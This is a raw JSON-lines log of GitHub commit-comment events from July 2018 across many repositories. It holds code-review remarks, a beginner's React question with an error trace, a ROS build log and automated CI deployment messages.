{"id":"7951075503","type":"CommitCommentEvent","actor":{"login":"evansharp"},"repo":{"name":"madrobby/zepto"},"payload":{"comment":{"id":29673378,"position":null,"line":null,"path":null,"commit_id":"763b3d6dc3b4350759ed30aa196cd2b6e39efcfb","created_at":"2018-07-11T16:00:53Z","updated_at":"2018-07-11T16:00:53Z","author_association":"NONE","body":"Seriously? You're updating the year in the licence when there are 61 issues open and 19 pull requests being ignored?"}},"created_at":"2018-07-11T16:00:53Z"}
{"id":"7951075634","type":"CommitCommentEvent","actor":{"login":"mrose17"},"repo":{"name":"brave-intl/brave-node-notifier"},"payload":{"comment":{"id":29673379,"position":null,"line":null,"path":null,"commit_id":"3c619afaff4d99e7cbc049343a69ed02fb69147f","created_at":"2018-07-11T16:00:54Z","updated_at":"2018-07-11T16:00:54Z","author_association":"NONE","body":"thank you!"}},"created_at":"2018-07-11T16:00:54Z"}
{"id":"7951077285","type":"CommitCommentEvent","actor":{"login":"origindesign"},"repo":{"name":"origindesign/skitaos"},"payload":{"comment":{"id":29673382,"position":null,"line":null,"path":null,"commit_id":"2f71edad3fd4474dfbdfb596f09d6264910bf1fb","created_at":"2018-07-11T16:01:10Z","updated_at":"2018-07-11T16:01:10Z","author_association":"OWNER","body":"Created multidev environment [ski-taos#ci-25](https://dashboard.pantheon.io/sites/22e63f3f-bdff-4894-a158-a29f219020d1#ci-25).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-25-ski-taos.pantheonsite.io/)"}},"created_at":"2018-07-11T16:01:10Z"}
{"id":"7951077864","type":"CommitCommentEvent","actor":{"login":"Ahmedfarghal"},"repo":{"name":"udacity/reactnd-contacts-complete"},"payload":{"comment":{"id":29673385,"position":null,"line":null,"path":null,"commit_id":"abd5fccf9a69546e75d9c178379d3ef92405719e","created_at":"2018-07-11T16:01:15Z","updated_at":"2018-07-11T16:01:15Z","author_association":"NONE","body":"`import React, { Component } from 'react'\r\nimport PropTypes from 'prop-types'\r\nimport escapeRegExp from 'escape-string-regexp'\r\nimport sortBy from 'sort-by'\r\n\r\n\r\nclass ListContacts extends Component {\r\n    static propTypes = {\r\n      contacts: PropTypes.array.isRequired,\r\n      onDeleteContact: PropTypes.func.isRequired\r\n    }\r\n\r\n    state = {\r\n      query: ''\r\n    }\r\n\r\n  updateQuery = (query) => {\r\n    this.setState({ query: query.trim() })\r\n  }\r\n\r\n\r\nrender(){\r\n  let showingContacts\r\n    if(this.state.query){\r\n        const match = new RegExp(escapeRegExp(this.state.query),'i')\r\n        showingContacts = this.props.contacts.filter((contact)=> match.test(contact.name) )\r\n    } else {\r\n      showingContacts = this.props.contacts\r\n    }\r\n\r\n\r\n\r\n  return(\r\n        <div className='list-contacts'>\r\n        {JSON.stringify(this.state)}\r\n                <div className='list-contacts-top'>\r\n                    <input\r\n                      className='search-contacts'\r\n                      type='text'\r\n                      placeholder='Search contacts'\r\n                      value={this.state.query}\r\n                      onChange={(event) => this.updateQuery(event.target.value)} />\r\n                  </div>\r\n              <ol className = 'contact-list' >\r\n                  {showingContacts.contacts.map( (contacts) => (\r\n                      <li key = {contacts.id}className = 'contact-list-item' >\r\n                            <div className = 'contact-avatar'\r\n                                style = {\r\n                                    {\r\n                                  backgroundImage: `URL($(contact-avatarURL))`\r\n                                }}>\r\n                                <div className='contact-details'>\r\n                                    <p>{contacts.name}</p>\r\n                                    <p>{contacts.email}</p>\r\n                                    <p>{contacts.id}</p>\r\n                                    <button onClick={()=> this.props.onDeleteContact(contacts)} className='contact-remove'>\r\n                                      \r\n                                    </button>\r\n                                </div>\r\n                            </div>\r\n                      </li>\r\n                    )\r\n                  )}\r\n              </ol>\r\n        </div>\r\n  )\r\n}\r\n}\r\n\r\n\r\n\r\n\r\nexport default ListContacts`"}},"created_at":"2018-07-11T16:01:15Z"}
{"id":"7951079168","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29673388,"position":73,"line":44,"path":"contracts/Remittance.sol","commit_id":"f69b6002b1f9a8c0f24438f35653af1f070a0659","created_at":"2018-07-11T16:01:28Z","updated_at":"2018-07-11T16:01:28Z","author_association":"NONE","body":"Also, the computation is public too. Anyone can replay it and see what inputs and algorithm were used."}},"created_at":"2018-07-11T16:01:28Z"}
{"id":"7951080773","type":"CommitCommentEvent","actor":{"login":"Ahmedfarghal"},"repo":{"name":"udacity/reactnd-contacts-complete"},"payload":{"comment":{"id":29673390,"position":null,"line":null,"path":null,"commit_id":"abd5fccf9a69546e75d9c178379d3ef92405719e","created_at":"2018-07-11T16:01:44Z","updated_at":"2018-07-11T16:01:44Z","author_association":"NONE","body":"```import React, { Component } from 'react'\r\nimport PropTypes from 'prop-types'\r\nimport escapeRegExp from 'escape-string-regexp'\r\nimport sortBy from 'sort-by'\r\n\r\n\r\nclass ListContacts extends Component {\r\n    static propTypes = {\r\n      contacts: PropTypes.array.isRequired,\r\n      onDeleteContact: PropTypes.func.isRequired\r\n    }\r\n\r\n    state = {\r\n      query: ''\r\n    }\r\n\r\n  updateQuery = (query) => {\r\n    this.setState({ query: query.trim() })\r\n  }\r\n\r\n\r\nrender(){\r\n  let showingContacts\r\n    if(this.state.query){\r\n        const match = new RegExp(escapeRegExp(this.state.query),'i')\r\n        showingContacts = this.props.contacts.filter((contact)=> match.test(contact.name) )\r\n    } else {\r\n      showingContacts = this.props.contacts\r\n    }\r\n\r\n\r\n\r\n  return(\r\n        <div className='list-contacts'>\r\n        {JSON.stringify(this.state)}\r\n                <div className='list-contacts-top'>\r\n                    <input\r\n                      className='search-contacts'\r\n                      type='text'\r\n                      placeholder='Search contacts'\r\n                      value={this.state.query}\r\n                      onChange={(event) => this.updateQuery(event.target.value)} />\r\n                  </div>\r\n              <ol className = 'contact-list' >\r\n                  {showingContacts.contacts.map( (contacts) => (\r\n                      <li key = {contacts.id}className = 'contact-list-item' >\r\n                            <div className = 'contact-avatar'\r\n                                style = {\r\n                                    {\r\n                                  backgroundImage: `URL($(contact-avatarURL))`\r\n                                }}>\r\n                                <div className='contact-details'>\r\n                                    <p>{contacts.name}</p>\r\n                                    <p>{contacts.email}</p>\r\n                                    <p>{contacts.id}</p>\r\n                                    <button onClick={()=> this.props.onDeleteContact(contacts)} className='contact-remove'>\r\n                                      \r\n                                    </button>\r\n                                </div>\r\n                            </div>\r\n                      </li>\r\n                    )\r\n                  )}\r\n              </ol>\r\n        </div>\r\n  )\r\n}\r\n}\r\n\r\n\r\n\r\n\r\nexport default ListContacts ```"}},"created_at":"2018-07-11T16:01:44Z"}
{"id":"7951080796","type":"CommitCommentEvent","actor":{"login":"stevegolton"},"repo":{"name":"stevegolton/librouteros"},"payload":{"comment":{"id":29673391,"position":null,"line":null,"path":null,"commit_id":"d7c1de0a8b810853a48b9fc741d4c8492e597590","created_at":"2018-07-11T16:01:45Z","updated_at":"2018-07-11T16:01:45Z","author_association":"OWNER","body":"Hmm good point. I only saw that fix after posting my last comment.\r\n\r\nI think receive timeout is still useful so the lib has a chance to return if the connection completely drops."}},"created_at":"2018-07-11T16:01:45Z"}
{"id":"7951082749","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29673394,"position":101,"line":63,"path":"contracts/Remittance.sol","commit_id":"f69b6002b1f9a8c0f24438f35653af1f070a0659","created_at":"2018-07-11T16:02:04Z","updated_at":"2018-07-11T16:02:04Z","author_association":"NONE","body":"How do you prevent people from reusing the same `optx`?"}},"created_at":"2018-07-11T16:02:04Z"}
{"id":"7951088349","type":"CommitCommentEvent","actor":{"login":"wouterlucas"},"repo":{"name":"WebPlatformForEmbedded/meta-wpe"},"payload":{"comment":{"id":29673403,"position":null,"line":null,"path":null,"commit_id":"2d1a731919e08f3de3f7193085631c3ffe53bed0","created_at":"2018-07-11T16:03:04Z","updated_at":"2018-07-11T16:03:04Z","author_association":"CONTRIBUTOR","body":"Haha yes. Yikes! Is indeed appropriate. \n\nBut shortest time to get it done and sometimes you gotta do whatcha gotta do. \n\n> On Jul 11, 2018, at 8:52 AM, Khem Raj <notifications@github.com> wrote:\n> \n> yikes !\n> \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2018-07-11T16:03:04Z"}
{"id":"7951089320","type":"CommitCommentEvent","actor":{"login":"Ahmedfarghal"},"repo":{"name":"udacity/reactnd-contacts-complete"},"payload":{"comment":{"id":29673405,"position":null,"line":null,"path":null,"commit_id":"abd5fccf9a69546e75d9c178379d3ef92405719e","created_at":"2018-07-11T16:03:14Z","updated_at":"2018-07-11T16:03:14Z","author_association":"NONE","body":"when i change``` this.props``` to ```showingContacts``` i get an error why is that \r\n\r\nshowingContacts.contacts.map( (contacts) => (\r\n\r\n```TypeError: Cannot read property 'map' of undefined\r\nListContacts.render\r\nsrc/ListContacts.js:45\r\n  42 |         onChange={(event) => this.updateQuery(event.target.value)} />\r\n  43 |     </div>\r\n  44 | <ol className = 'contact-list' >\r\n> 45 |     {showingContacts.contacts.map( (contacts) => (\r\n  46 |         <li key = {contacts.id}className = 'contact-list-item' >\r\n  47 |               <div className = 'contact-avatar'\r\n  48 |                   style = {```"}},"created_at":"2018-07-11T16:03:14Z"}
{"id":"7951089321","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29673406,"position":123,"line":72,"path":"contracts/Remittance.sol","commit_id":"f69b6002b1f9a8c0f24438f35653af1f070a0659","created_at":"2018-07-11T16:03:14Z","updated_at":"2018-07-11T16:03:14Z","author_association":"NONE","body":"`private` here only means that another contract cannot see it. But me, with my Remix debugger, I can."}},"created_at":"2018-07-11T16:03:14Z"}
{"id":"7951092462","type":"CommitCommentEvent","actor":{"login":"piasummers"},"repo":{"name":"piasummers/piasummers.github.io"},"payload":{"comment":{"id":29673411,"position":26,"line":17,"path":"index.html","commit_id":"86e1780989d8e51719b887c4d7d53eb7eff7d56b","created_at":"2018-07-11T16:03:48Z","updated_at":"2018-07-11T16:03:48Z","author_association":"OWNER","body":".theBlackBackground {background-color:#000;color: white;}    \r\n    </style>"}},"created_at":"2018-07-11T16:03:48Z"}
{"id":"7951098141","type":"CommitCommentEvent","actor":{"login":"orhirshfeld"},"repo":{"name":"ros/roscpp_core"},"payload":{"comment":{"id":29673420,"position":null,"line":null,"path":null,"commit_id":"33d68d0d2b24bffd6c5ac8629f3a0f3e1c05408c","created_at":"2018-07-11T16:04:46Z","updated_at":"2018-07-11T16:04:46Z","author_association":"NONE","body":"I'm having some issue with this change\r\nwhen i try to compile from source it return the following error:\r\n‘CONSOLE_BRIDGE_LOG_ERROR’ is not a member of ‘console_bridge’\r\n\r\nfull log:\r\n==> Processing catkin package: 'cpp_common'\r\n==> Building with env: '/home/deltatau/ros_catkin_ws/install_isolated/env.sh'\r\nMakefile exists, skipping explicit cmake invocation...\r\n==> make cmake_check_build_system in '/home/deltatau/ros_catkin_ws/build_isolated/cpp_common'\r\n==> make -j1 -l1 in '/home/deltatau/ros_catkin_ws/build_isolated/cpp_common'\r\n[ 50%] Building CXX object CMakeFiles/cpp_common.dir/src/header.cpp.o\r\n/home/deltatau/ros_catkin_ws/src/roscpp_core/cpp_common/src/header.cpp: In member function ‘bool ros::Header::parse(uint8_t*, uint32_t, std::string&)’:\r\n/home/deltatau/ros_catkin_ws/src/roscpp_core/cpp_common/src/header.cpp:88: error: ‘CONSOLE_BRIDGE_LOG_ERROR’ is not a member of ‘console_bridge’\r\n/home/deltatau/ros_catkin_ws/src/roscpp_core/cpp_common/src/header.cpp:102: error: ‘CONSOLE_BRIDGE_LOG_ERROR’ is not a member of ‘console_bridge’\r\nmake[2]: *** [CMakeFiles/cpp_common.dir/src/header.cpp.o] Error 1\r\nmake[1]: *** [CMakeFiles/cpp_common.dir/all] Error 2\r\nmake: *** [all] Error 2\r\n<== Failed to process package 'cpp_common': \r\n  Command '['/home/deltatau/ros_catkin_ws/install_isolated/env.sh', 'make', '-j1', '-l1']' returned non-zero exit status 2\r\n\r\nReproduce this error by running:\r\n==> cd /home/deltatau/ros_catkin_ws/build_isolated/cpp_common && /home/deltatau/ros_catkin_ws/install_isolated/env.sh make -j1 -l1\r\n"}},"created_at":"2018-07-11T16:04:46Z"}
{"id":"7951099717","type":"CommitCommentEvent","actor":{"login":"dpinney"},"repo":{"name":"dpinney/omf"},"payload":{"comment":{"id":29673424,"position":null,"line":null,"path":null,"commit_id":"171274283be10155a9e1d762baabada516e2ebc7","created_at":"2018-07-11T16:05:02Z","updated_at":"2018-07-11T16:05:02Z","author_association":"OWNER","body":"nice 👍"}},"created_at":"2018-07-11T16:05:02Z"}
{"id":"7951101143","type":"CommitCommentEvent","actor":{"login":"Rian501"},"repo":{"name":"Shu52/SongList"},"payload":{"comment":{"id":29673428,"position":null,"line":null,"path":null,"commit_id":"41555aa8dcd0511f5704adbbc9d61525cf2e4e50","created_at":"2018-07-11T16:05:17Z","updated_at":"2018-07-11T16:05:17Z","author_association":"NONE","body":"Shu this is great! Let me know if you need any help with the checkbox stuff, but otherwise you are on a roll."}},"created_at":"2018-07-11T16:05:17Z"}
{"id":"7951102018","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":29673429,"position":null,"line":null,"path":null,"commit_id":"c58147e0cfd1a7887f56eed4ef61fe342e1280bb","created_at":"2018-07-11T16:05:26Z","updated_at":"2018-07-11T16:05:26Z","author_association":"NONE","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.732.c58147e0cfd1a7887f56eed4ef61fe342e1280bb](http://build.palaso.org/viewLog.html?buildId=124606&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 1864, ignored: 18 Build time: 00:08:10"}},"created_at":"2018-07-11T16:05:26Z"}
{"id":"7951102344","type":"CommitCommentEvent","actor":{"login":"PepeAmpere"},"repo":{"name":"spring1944/spring1944"},"payload":{"comment":{"id":29673430,"position":null,"line":null,"path":null,"commit_id":"f67e7d460edb9872cd4ccc3fc6dbe8bdd5339e8b","created_at":"2018-07-11T16:05:29Z","updated_at":"2018-07-11T16:05:29Z","author_association":"CONTRIBUTOR","body":"@specing no, setup of development autohost should reflect developers needs, settings in game should reflect needs of the product for final users - players. \r\n\r\n@sanguinariojoe \r\n\r\n* I'm ok with JAL being free to tweak parameters, this practice can continue.\r\n* I'm NOT ok if he misuses his right to make changes in situation hes aware of conflicting opinions. \r\n\r\n----\r\n\r\nRegarding right values:\r\n\r\n* Setting 90 % capture ratio + 6 minutes timeout effectively disables the feature at all. So its silly and I think there is noone supporting such drastic change.\r\n* Original value is 70 % + 6 minutes. I still think this is good default for our Steam players (esp. because they will use new UI, right ;), so they are not surprised by game end) but I understand it may not be good for hardcore players or testing games.\r\n** For such situation we have ability to set different defaults in *dev autohost* settings and do not mix the game setup good for all with game setup good for small group of people.\r\n** If JAL is not able to get access to the configs, thats another story, but it is JALs duty to try it this (proper) way first and do break good balance.\r\n* If you would like to increase the default percentage of strongpoints to trigger strategic dominance, at the same time we should decrease the timeout default value.\r\n** I think values above 80 % have no sense - its equivalent to disabling given feature\r\n** For e.g. 80 % strategic dominance i think good timeout would be 2-4 minutes, not more.\r\n"}},"created_at":"2018-07-11T16:05:29Z"}
{"id":"7951102352","type":"CommitCommentEvent","actor":{"login":"godbyk"},"repo":{"name":"rpavlik/cmake-modules"},"payload":{"comment":{"id":29673431,"position":56,"line":56,"path":"InstallDebugSymbols.cmake","commit_id":"8a18a1b49ad9f6182f3e326817602c9d586526c4","created_at":"2018-07-11T16:05:29Z","updated_at":"2018-07-11T16:05:29Z","author_association":"NONE","body":"This `endif()` should be `endforeach()`."}},"created_at":"2018-07-11T16:05:29Z"}
{"id":"7951104126","type":"CommitCommentEvent","actor":{"login":"Sollace"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29673434,"position":null,"line":null,"path":null,"commit_id":"11ce47f3defa98a3c65ec2eb401c2d2997236458","created_at":"2018-07-11T16:05:48Z","updated_at":"2018-07-11T16:05:48Z","author_association":"MEMBER","body":"Well the class is copied straight from my own mod. :T"}},"created_at":"2018-07-11T16:05:48Z"}
{"id":"7951105729","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29673438,"position":null,"line":null,"path":null,"commit_id":"a69b7f657d6115bb6cfc0e48af2d36d46b38f624","created_at":"2018-07-11T16:06:07Z","updated_at":"2018-07-11T16:06:07Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-41](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-41).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-41-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-11T16:06:07Z"}
{"id":"7951106520","type":"CommitCommentEvent","actor":{"login":"muxx"},"repo":{"name":"DmitryZagorulko/messenger"},"payload":{"comment":{"id":29673439,"position":109,"line":318,"path":"response.go","commit_id":"982f172def891ba8025690195ad3382713b87201","created_at":"2018-07-11T16:06:15Z","updated_at":"2018-07-11T16:06:15Z","author_association":"NONE","body":"why `ResponseAPI` but not `Response`? And response struct is more logically placed after request structs."}},"created_at":"2018-07-11T16:06:15Z"}
{"id":"7951107719","type":"CommitCommentEvent","actor":{"login":"MrAlex94"},"repo":{"name":"MrAlex94/Waterfox"},"payload":{"comment":{"id":29673440,"position":null,"line":null,"path":null,"commit_id":"1f97c23bd09087d55f647cafdead72eb750e9260","created_at":"2018-07-11T16:06:27Z","updated_at":"2018-07-11T16:06:27Z","author_association":"OWNER","body":"`git bisect` too an awfully long time, but this patch is the result of [this](https://github.com/MrAlex94/Waterfox/issues/692) issue on Windows. For some reason it does not effect *nix systems, so am investigating why."}},"created_at":"2018-07-11T16:06:27Z"}
{"id":"7951109233","type":"CommitCommentEvent","actor":{"login":"illfated"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29673441,"position":null,"line":null,"path":null,"commit_id":"3963492bec37491cd6584c3deaa23f2b5c7fb1fa","created_at":"2018-07-11T16:06:45Z","updated_at":"2018-07-11T16:06:45Z","author_association":"NONE","body":"OK, so for SAI line `id` 4 it should be something like `\"Skywing - On Waypoint 50 Reached - Pause Waypoint\"),` - right?"}},"created_at":"2018-07-11T16:06:45Z"}
{"id":"7951112491","type":"CommitCommentEvent","actor":{"login":"wes077"},"repo":{"name":"wes077/for-ever"},"payload":{"comment":{"id":29673448,"position":null,"line":null,"path":null,"commit_id":"d027b3a49cf577f5399d9045277d5b607a5a6a04","created_at":"2018-07-11T16:07:21Z","updated_at":"2018-07-11T16:07:21Z","author_association":"OWNER","body":"it remains as a matter of time before reality settles in human minds"}},"created_at":"2018-07-11T16:07:21Z"}
{"id":"7951112622","type":"CommitCommentEvent","actor":{"login":"ch4ot1c"},"repo":{"name":"BTCPrivate/BTCP-Rebase"},"payload":{"comment":{"id":29673449,"position":null,"line":null,"path":null,"commit_id":"03bd0770b972e5f97e11d503521e7099d1d97c45","created_at":"2018-07-11T16:07:22Z","updated_at":"2018-07-11T16:07:22Z","author_association":"CONTRIBUTOR","body":"Ack"}},"created_at":"2018-07-11T16:07:22Z"}
{"id":"7951116577","type":"CommitCommentEvent","actor":{"login":"sabran125"},"repo":{"name":"blockchain/My-Wallet-V3-Android"},"payload":{"comment":{"id":29673457,"position":null,"line":null,"path":null,"commit_id":"ab8ee896cd78b18d8a9a00e32d54486e3e22f438","created_at":"2018-07-11T16:08:07Z","updated_at":"2018-07-11T16:08:07Z","author_association":"NONE","body":"ab8ee89\r\n"}},"created_at":"2018-07-11T16:08:07Z"}
{"id":"7951117282","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29673458,"position":null,"line":null,"path":null,"commit_id":"0034f57de82c2e73130b75884dbbdb8a789838ce","created_at":"2018-07-11T16:08:14Z","updated_at":"2018-07-11T16:08:14Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-160812 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-160812\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-11T16:08:14Z"}
{"id":"7951118728","type":"CommitCommentEvent","actor":{"login":"mikaelarguedas"},"repo":{"name":"ros/roscpp_core"},"payload":{"comment":{"id":29673461,"position":null,"line":null,"path":null,"commit_id":"33d68d0d2b24bffd6c5ac8629f3a0f3e1c05408c","created_at":"2018-07-11T16:08:30Z","updated_at":"2018-07-11T16:08:30Z","author_association":"CONTRIBUTOR","body":"Can you please open a new issue for this? I'm afraid commenting on a commit won't have much visibility.\r\n\r\nIdeally your issue should state what operating system you are using, what version of ROS and the exact steps to reproduce the issue.\r\nThanks! "}},"created_at":"2018-07-11T16:08:30Z"}
{"id":"7951119474","type":"CommitCommentEvent","actor":{"login":"micmac1"},"repo":{"name":"openwrt/packages"},"payload":{"comment":{"id":29673464,"position":null,"line":null,"path":null,"commit_id":"f6e06384f1c5aca396ec65a70ec94837f1c133a8","created_at":"2018-07-11T16:08:38Z","updated_at":"2018-07-11T16:08:38Z","author_association":"CONTRIBUTOR","body":"Check crypto lib version on device. Did you download php7 package or compile yourself?\n"}},"created_at":"2018-07-11T16:08:38Z"}
{"id":"7951122208","type":"CommitCommentEvent","actor":{"login":"andreaskoepf"},"repo":{"name":"Xamla/motoman"},"payload":{"comment":{"id":29673472,"position":5,"line":245,"path":"motoman_driver/src/industrial_robot_client/joint_trajectory_streamer.cpp","commit_id":"e02ebfc8368018d3faf6fdfe33e8c466d4c99973","created_at":"2018-07-11T16:09:09Z","updated_at":"2018-07-11T16:09:09Z","author_association":"MEMBER","body":"state is read here outside of lock... it would be better to first enter the mutex and then read a consistent state"}},"created_at":"2018-07-11T16:09:09Z"}
{"id":"7951122262","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"c-osanai/techdrive"},"payload":{"comment":{"id":29673473,"position":27,"line":27,"path":"019/1902.html","commit_id":"f5e1be67505177707df4f97eefb9d873c89d8311","created_at":"2018-07-11T16:09:10Z","updated_at":"2018-07-11T16:09:10Z","author_association":"COLLABORATOR","body":"@c-osanai \r\n「javascript 配列 追加 」で調べてみましょう！\r\nトライはしてほしいのですが、詰まるようであれば土曜日に対面でもいいですね！"}},"created_at":"2018-07-11T16:09:10Z"}
{"id":"7951125862","type":"CommitCommentEvent","actor":{"login":"dguzek"},"repo":{"name":"dguzek/Simply-Love-SM5"},"payload":{"comment":{"id":29673480,"position":null,"line":null,"path":null,"commit_id":"cc0da16e8d050d8d420100393b8ebc6930fa59bf","created_at":"2018-07-11T16:09:47Z","updated_at":"2018-07-11T16:09:47Z","author_association":"OWNER","body":"To be fair, this commit occurred on May 2, 2018, and you [submitted your first pull request](https://github.com/dguzek/Simply-Love-SM5/pull/113) a week later on May 8, 2018.  You were added to the Acknowledgments a day a later, May 9, 2018.  See: 9c758b6442de5bb2c1f41947a44e06d00400508b"}},"created_at":"2018-07-11T16:09:47Z"}
{"id":"7951126170","type":"CommitCommentEvent","actor":{"login":"vimalH"},"repo":{"name":"vimalH/EarlyDiseaseDetection"},"payload":{"comment":{"id":29673481,"position":7,"line":11,"path":"README.md","commit_id":"34abf65bc91747099462cbc3911d2dbc99cdf401","created_at":"2018-07-11T16:09:50Z","updated_at":"2018-07-11T16:09:50Z","author_association":"OWNER","body":"#"}},"created_at":"2018-07-11T16:09:50Z"}
{"id":"7951129551","type":"CommitCommentEvent","actor":{"login":"marlonbihre2"},"repo":{"name":"marlonbihre2/AutoIt"},"payload":{"comment":{"id":29673487,"position":null,"line":null,"path":null,"commit_id":"e3e9342dccb7d93bed146c8ee3a0f6e2025ff2a4","created_at":"2018-07-11T16:10:27Z","updated_at":"2018-07-11T16:10:27Z","author_association":"OWNER","body":"primeiro commit de um projeto real"}},"created_at":"2018-07-11T16:10:27Z"}
{"id":"7951137323","type":"CommitCommentEvent","actor":{"login":"NNskelly"},"repo":{"name":"muffinista/twit"},"payload":{"comment":{"id":29673501,"position":null,"line":null,"path":null,"commit_id":"93cf4769fd67cc4bb35b316962ba075fbfbd6adb","created_at":"2018-07-11T16:11:48Z","updated_at":"2018-07-11T16:11:48Z","author_association":"NONE","body":"Can confirm the twitter.js patch fixes the media/upload STATUS query (thanks!).  Have not needed to use any other GET endpoints, so I don't know if it has any side-effects on those.\r\nThe media category issues appear to have been erroneous-fixed circa 2.2.10 and proper-fixed in 2.2.11, so the rest of this update is likely obsolete."}},"created_at":"2018-07-11T16:11:48Z"}
{"id":"7951137441","type":"CommitCommentEvent","actor":{"login":"Davidc2525"},"repo":{"name":"Davidc2525/SucreCloud"},"payload":{"comment":{"id":29673504,"position":23,"line":39,"path":"webpack/webpack.config.client.js","commit_id":"55919c94c12b01e4acdd854d3b6d6e0db786df13","created_at":"2018-07-11T16:11:49Z","updated_at":"2018-07-11T16:11:49Z","author_association":"OWNER","body":"como client.js es el primero en cargar, es mejor q sea mas libiano "}},"created_at":"2018-07-11T16:11:49Z"}
{"id":"7951138209","type":"CommitCommentEvent","actor":{"login":"prasanthhs"},"repo":{"name":"dice-group/sask"},"payload":{"comment":{"id":29673506,"position":60,"line":60,"path":"chatbot/src/main/java/chatbot/core/handlers/qa/QAServiceHandler.java","commit_id":"4f930379a6f4ad612d336abb60fa72aa9d249c46","created_at":"2018-07-11T16:11:58Z","updated_at":"2018-07-11T16:11:58Z","author_association":"COLLABORATOR","body":"@sajjadpz Handler.java has a method to send HTTP Request. If you want, you could move it there and replace the existing implementation if required."}},"created_at":"2018-07-11T16:11:58Z"}
{"id":"7951141147","type":"CommitCommentEvent","actor":{"login":"origindesign"},"repo":{"name":"origindesign/skitaos"},"payload":{"comment":{"id":29673510,"position":null,"line":null,"path":null,"commit_id":"3255a97a281f1242d084836c088f2285e41f580f","created_at":"2018-07-11T16:12:31Z","updated_at":"2018-07-11T16:12:31Z","author_association":"OWNER","body":"Created multidev environment [ski-taos#ci-26](https://dashboard.pantheon.io/sites/22e63f3f-bdff-4894-a158-a29f219020d1#ci-26).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-26-ski-taos.pantheonsite.io/)"}},"created_at":"2018-07-11T16:12:31Z"}
{"id":"7951144126","type":"CommitCommentEvent","actor":{"login":"ernesto-diaz"},"repo":{"name":"dgraum/datapower-ansible"},"payload":{"comment":{"id":29673517,"position":null,"line":null,"path":null,"commit_id":"81962f86ac575f9f8d55402f170f3762f7e42b6e","created_at":"2018-07-11T16:13:02Z","updated_at":"2018-07-11T16:13:02Z","author_association":"NONE","body":"Good stuff!!"}},"created_at":"2018-07-11T16:13:02Z"}
{"id":"7951144191","type":"CommitCommentEvent","actor":{"login":"prasanthhs"},"repo":{"name":"dice-group/sask"},"payload":{"comment":{"id":29673518,"position":41,"line":41,"path":"chatbot/src/main/java/chatbot/core/handlers/qa/QAServiceHandler.java","commit_id":"4f930379a6f4ad612d336abb60fa72aa9d249c46","created_at":"2018-07-11T16:13:03Z","updated_at":"2018-07-11T16:13:03Z","author_association":"COLLABORATOR","body":"Should use search() for your implementation. Controller will call this method directly. It does not know other functions of the class."}},"created_at":"2018-07-11T16:13:03Z"}
{"id":"7951147661","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29673532,"position":null,"line":null,"path":null,"commit_id":"b50fe8286ce0da4b0ac45f5fbf2856e034f3edc6","created_at":"2018-07-11T16:13:39Z","updated_at":"2018-07-11T16:13:39Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-174](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-174).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-174-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-11T16:13:39Z"}
